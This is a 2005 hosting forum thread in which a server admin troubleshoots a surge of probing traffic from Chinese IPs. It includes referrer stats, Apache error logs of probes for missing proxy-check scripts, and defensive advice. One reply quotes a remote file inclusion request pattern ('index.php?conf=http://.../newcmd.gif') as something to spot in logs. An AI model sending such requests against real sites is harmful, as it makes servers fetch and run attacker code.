Results 1 to 13 of 13
-
06-03-2005, 07:56 AM #1WHT Addict
- Join Date
- Nov 2004
- Location
- Marietta PA
- Posts
- 138
Odd page visits and large hit count
Over the last few day I have noticed that my visits from china have greatly increased which is never a good thing (no offense to any one from that area).
In awastat section where it shows you the most pages visit I am seeing page hits for urls on other servers instead. 99% of these links lead to a prxjdg - created by PRX4EVER with site address http://prx4ever.virtualave.net/ps/ (the link no longer exists).
I have attached a screen shot of the awastats.
What ever this is it has eaten up 200 mb of bw over night which not a big deal currently.
I have ran rkhunter and chrootkit and both give a clean bill of health
the netstat output does not show any weird ports open though it shoulws about 50 china ip addresses conencted to my ip via port 80.
My website (not the hosting one) shows a who is online count of over 100 users lately.
Now the site I mention is running mambo 4.5.2.1 it is also the firs site that was added to our cpanel server so I see hits for the other domains soem times in our logs. IE people going to whois.sc for another domain on the server shows up in my awastats.
The server is fedora core 2 protected with apf firewall.
I dont know if this is a new attack casue I just saw it start up on the 1st of june. I have checked server logs and do not see anything weird the temp dir has the t bit and there is nothing hidden in there.
If any one has any thought on this please give us a shout or post in here.
Oh yeah and tcpdump and ethereal do not show any strange traffic on the nic. though I see many repeat hits from the same ips on port 80 some times a few 100 at a time.Digital Offensive
http://www.digitaloffensive.com
Take an offensive approach to Security know what your foes know!
-
06-03-2005, 08:14 AM #2WHT Addict
- Join Date
- Nov 2004
- Location
- Marietta PA
- Posts
- 138
More oddities:
Connect to site from
Origin Pages Percent Hits Percent
Direct address / Bookmarks 305 4.3 % 341 2.2 %
Links from a NewsGroup
Links from an Internet Search Engine - Full list
- Google 2609 2762
- Baidu 5 5
- Unknown search engines 3 3
- Yahoo 2 2
2619 37 % 2772 18 %
Links from an external page (other web sites except search engines) - Full list
- http://www.hit2seek.com/portal.php 136 136
- http://www.happyfeeds.com/happy.php 129 129
- http://softfeed.com 113 113
- http://sohohunter.com 102 102
- http://www.highway61.com 98 789
- http://www.flyppc.com/portal.php 91 91
- http://www.allgame.com 86 86
- http://www.lenovo-search.com 75 75
- http://www.yoomy.com/portal.php 41 41
- http://www.found-best.com 40 40
- http://www.esearchall.com/portal.php 38 38
- http://www.mygole.com 34 34
- http://portal.pengs.com 33 33
- http://www.searchorfind.com 33 33
- http://www.searchmirth.com 31 31
- http://www.gogosearch.net/portal.php 31 31
- http://www.mobygames.com 31 31
- http://www.paxgamers.com 30 30
- http://www.jebest.com 28 28
- http://www.telefragged.com 27 27
- http://www.themanroom.com 27 27
- http://www.sharkygames.com 26 26
- http://www.nukewinter.com 26 26
- http://quicky-search.net 26 26
- http://www.gamepro.com 25 25
- Others 2789 10236
4146 58.6 % 12284 79.7 %Digital Offensive
http://www.digitaloffensive.com
Take an offensive approach to Security know what your foes know!
-
06-03-2005, 08:28 AM #3WHT Addict
- Join Date
- Oct 2004
- Posts
- 133
Browse through the account`s folders.
See if there are any unusual files.
It is possible that somebody hopes to exceed the bandwidth for this site. This is just a suggestion and a possible reason.
The lack of logical reason for this is even more disturbing.
I believe you would have felt better if you did find something.
If there is nothing, absolutely nothing strange, my guess is that
somebody wishes to force bandwidth exceeding.
I hope that somebody will manage to help you.
-
06-03-2005, 08:30 AM #4WHT Addict
- Join Date
- Nov 2004
- Location
- Marietta PA
- Posts
- 138
Arny thanks, I am not worrying about the bw, but you are right I would of felt better if the logs showed soemthing or if there was a trojan found. I have 2000 gb to use and the server with all the sites on it has never broken 20 gb.
Digital Offensive
http://www.digitaloffensive.com
Take an offensive approach to Security know what your foes know!
-
06-03-2005, 08:33 AM #5Junior Guru
- Join Date
- Dec 2004
- Posts
- 224
Have you enabled hotlink protection?? Other domains can steal your bandwidth that way..
-
06-03-2005, 08:35 AM #6Junior Guru
- Join Date
- Dec 2004
- Posts
- 224
Also you could disable directory indexing for the folders which neednt be accessed using urls..
-
06-03-2005, 08:42 AM #7WHT Addict
- Join Date
- Nov 2004
- Location
- Marietta PA
- Posts
- 138
no I havent but I can do that, the issue though I dont think they are linking to my files especaially since all the links involved are proxy checkign servers.
Though thanks for the tip.Digital Offensive
http://www.digitaloffensive.com
Take an offensive approach to Security know what your foes know!
-
06-03-2005, 08:58 AM #8Junior Guru
- Join Date
- Dec 2004
- Posts
- 224
Do you have mod_security installed?? You can set up custom filters to stop access to other urls using your domain in the browser.. Check for apache/domlogs for this domain and you should be able to see entries like..
...GET /index.php?conf=http://www.domain.com/.../newcmd.gif.....
something like this.
Check if these are from a prticular IP.
-
06-03-2005, 09:56 AM #9WHT Addict
- Join Date
- Oct 2004
- Posts
- 133
And if they are from particular IP addresses or whole IP range, I`m thinking for one nice IP ban.
-
06-03-2005, 10:05 AM #10WHT Addict
- Join Date
- Nov 2004
- Location
- Marietta PA
- Posts
- 138
Yeah iam thinking of blocking china for a few days.
Digital Offensive
http://www.digitaloffensive.com
Take an offensive approach to Security know what your foes know!
-
06-03-2005, 11:08 AM #11WHT Addict
- Join Date
- Nov 2004
- Location
- Marietta PA
- Posts
- 138
Here is more info, looks like all the scripts these people are looking for dont exist though I already new that. I guess there is a new hack out there search for vuln scripts:
Jun 3 11:04:56 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:56 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
[Fri Jun 3 11:04:34 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:34 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
[Fri Jun 3 11:04:31 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:31 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/~mana_/prxjdg.cgi
[Fri Jun 3 11:04:28 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:28 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
[Fri Jun 3 11:04:18 2005] [error] [client 218.56.237.242] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:18 2005] [error] [client 218.56.237.242] script not found or unable to stat: /home/xxxx/public_html/ip.cgi
[Fri Jun 3 11:04:14 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:14 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
[Fri Jun 3 11:04:13 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:13 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/proxycheck.pl
[Fri Jun 3 11:04:11 2005] [error] [client 218.56.238.75] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:11 2005] [error] [client 218.56.238.75] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
[Fri Jun 3 11:04:06 2005] [error] [client 218.56.238.75] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:06 2005] [error] [client 218.56.238.75] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
[Fri Jun 3 11:03:56 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:03:56 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/ip.cgi
[Fri Jun 3 11:03:53 2005] [error] [client 218.56.239.72] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:03:53 2005] [error] [client 218.56.239.72] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
[Fri Jun 3 11:03:39 2005] [error] [client 218.56.237.242] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:03:39 2005] [error] [client 218.56.237.242] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
[Fri Jun 3 11:03:32 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:03:32 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/proxycheck.pl
[Fri Jun 3 11:03:28 2005] [error] [client 218.56.239.72] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:03:28 2005] [error] [client 218.56.239.72] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
[Fri Jun 3 11:03:27 2005] [error] [client 218.56.232.152] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:03:27 2005] [error] [client 218.56.232.152] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
[Fri Jun 3 11:03:25 2005] [error] [client 218.56.239.32] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:03:25 2005] [error] [client 218.56.239.32] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
[Fri Jun 3 11:03:04 2005] [error] [client 218.56.237.242] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:03:04 2005] [error] [client 218.56.237.242] script not found or unable to stat: /home/xxxx/public_html/ip.cgi
[Fri Jun 3 11:02:44 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:02:44 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
[Fri Jun 3 11:02:32 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:02:32 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
[Fri Jun 3 11:02:28 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:02:28 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
[Fri Jun 3 11:02:09 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:02:09 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/proxycheck.pl
[Fri Jun 3 11:02:07 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:02:07 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
As you can see they are all china ips. Which now have been blocked.Digital Offensive
http://www.digitaloffensive.com
Take an offensive approach to Security know what your foes know!
-
06-04-2005, 12:58 AM #12Junior Guru
- Join Date
- Dec 2004
- Posts
- 224
As you've blocked those IPs, do you still have issues?
-
06-04-2005, 03:00 PM #13WHT Addict
- Join Date
- Nov 2004
- Location
- Marietta PA
- Posts
- 138
I installed bfd last night nad it has block several 100 china ips
Digital Offensive
http://www.digitaloffensive.com
Take an offensive approach to Security know what your foes know!